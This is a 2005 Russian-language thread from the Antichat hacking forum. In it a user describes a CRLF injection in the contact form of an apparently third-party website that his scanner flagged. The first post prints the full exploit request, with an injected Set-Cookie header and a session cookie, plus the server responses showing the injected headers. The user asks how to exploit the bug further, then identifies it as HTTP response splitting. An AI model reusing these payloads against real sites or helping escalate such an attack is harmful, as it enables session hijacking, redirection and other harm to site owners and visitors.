ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS или CRLF Injection
  #1  
Старый 11.04.2005, 14:01
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


Question XSS или CRLF Injection

я просканил своим сканером один сайтик он мне выдал что есть возможность CRLF Injection..и выдал сайт с информацией http://www.securityfocus.com/archive/1/271515 .. так вот я посылаю уязвимому скрипту такой запрос
Код:
POST /contact/send.phtml HTTP/1.0  Accept: */*  Content-Type: application/x-www-form-urlencoded  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)  Host: www.сайт.ком  Content-Length: 312  Cookie: sessionid=61c68c27ef7e13a8992dc02ae32a699a;4images_lastvisit=1113210615;4images_userid=-1  Connection: Close                                           fName%5B1%5D=Name&fData%5B1%5D=1&fName%5B2%5D=Email&fData%5B2%5D=1&fName%5B3%5D=Message&fData%5B3%5D=1&fMail=info%40az-maz%2Ecom&fTitle=1&fSubject=mail%20from%20az-maz%20website&fCount=3&fOk=some_url%0d%0aSet-Cookie%3Athis_header%3Dwas_injected_by_wvsBad=http%3A%2F%2Fwww%2Eaz-maz%2Ecom%2Fcontact%2Ferror%2Ephp
а он в ответ смотрите что
Код:
HTTP/1.1 302 Found  Date: Mon, 11 Apr 2005 09:12:52 GMT  Server: Apache  X-Powered-By: PHP/4.3.9  Location: some_url  Set-Cookie: this_header=was_injected_by_wvs  Connection: close  Content-Type: text/html
это значит можно произвольно давать значения скрипту , да? и если в запросе вместо some_url подставить какой нить адрес потом вместо Set-Cookie подставить Location , вместо this_header подставить $url а дальше ввести адрес какогото сайта , то получим такой вот ответ
Код:
HTTP/1.1 302 Found  Date: Mon, 11 Apr 2005 09:40:53 GMT  Server: Apache  X-Powered-By: PHP/4.3.9  Location: сайт_который_написали  Location:$url=сайт  Connection: close  Content-Type: text/html
так вот , как можно использовать эту багу более грамотно
 
Ответить с цитированием

  #2  
Старый 11.04.2005, 19:39
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

ну плз ответьте мне это необходимо .. если не поняли то что я написал скажите и я все объясню по порядку =)
 
Ответить с цитированием

  #3  
Старый 12.04.2005, 12:47
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

даа похоже никто не хочет отвечать ...
 
Ответить с цитированием

  #4  
Старый 12.04.2005, 19:05
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

http://www.xakep.ru/magazine/xa/071/070/1.asp ну и ладно я уже нашел доки nо этому виду атаки и называется она HTTP Response Splitting
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ